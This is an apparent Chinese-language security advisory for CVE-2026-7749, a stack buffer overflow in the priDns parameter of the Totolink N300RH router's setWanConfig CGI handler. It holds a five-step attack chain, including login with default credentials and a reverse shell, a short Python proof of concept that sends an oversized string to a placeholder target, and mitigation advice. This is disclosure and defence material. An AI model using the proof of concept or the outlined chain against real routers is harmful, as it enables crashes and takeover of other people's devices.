IPBUF安全漏洞报告
English
CVE-2026-7749 CVSS 8.8 高危

CVE-2026-7749 Totolink N300RH缓冲区溢出漏洞

披露日期: 2026-05-04
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-7749
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Totolink N300RH

相关标签

缓冲区溢出Totolink路由器漏洞RCEIoT安全

漏洞概述

Totolink N300RH路由器在固件版本3.2.4-B20220812中被发现存在高危安全漏洞。该漏洞位于/cgi-bin/cstecgi.cgi文件的setWanConfig接口中,由于未正确验证用户输入的priDns参数,导致缓冲区溢出。攻击者可利用此漏洞无需用户交互即可发起远程攻击,造成设备敏感信息泄露、数据篡改或服务中断,建议尽快修复。

技术细节

该漏洞属于典型的栈缓冲区溢出。在Totolink N300RH的Web服务器组件中,cstecgi.cgi程序负责处理来自前端的配置请求。当处理setWanConfig功能的POST请求时,程序直接获取HTTP参数中的priDns字段,并使用不安全的拷贝函数(如strcpy)将其复制到栈上的局部变量中。由于未对输入长度进行校验,当攻击者发送超长的priDns字符串时,多余的数据将溢出缓冲区边界。攻击者可精心构造溢出数据覆盖返回地址,从而劫持程序执行流,结合ROP链技术在设备上执行任意系统命令,获取最高控制权。

攻击链分析

STEP 1
信息收集
扫描网络识别Totolink N300RH设备及其Web管理接口。
STEP 2
获取凭证
利用弱口令或默认凭证登录后台,获取低权限会话(满足PR:L要求)。
STEP 3
构造Payload
编写Python脚本,生成用于覆盖返回地址的特定恶意数据填充priDns参数。
STEP 4
发送攻击请求
向/cgi-bin/cstecgi.cgi发送包含恶意payload的POST请求。
STEP 5
执行代码
触发缓冲区溢出,设备执行预设的Shellcode,反弹Shell或导致DoS。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL target_url = "http://<TARGET_IP>/cgi-bin/cstecgi.cgi" # Authentication cookies (if required, PR:L implies some auth might be needed) cookies = { "Cookie": "uid=123456" } # Vulnerable payload: Buffer overflow pattern in 'priDns' # Sending a large string to trigger the overflow payload = "A" * 1000 data = { "function": "setWanConfig", "priDns": payload } try: response = requests.post(target_url, data=data, cookies=cookies, timeout=5) if response.status_code == 200: print("Request sent, check device for crash or shell.") else: print(f"Received status code: {response.status_code}") except Exception as e: print(f"An error occurred: {e}")

影响范围

Totolink N300RH 3.2.4-B20220812

防御指南

临时缓解措施
在未升级固件前,建议将管理界面仅绑定在内网IP地址,关闭远程Web管理功能。通过网络ACL限制访问源IP,并密切监控路由器CPU和内存使用情况。如发现异常重启或流量激增,应立即断开设备网络并进行固件重置或升级。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表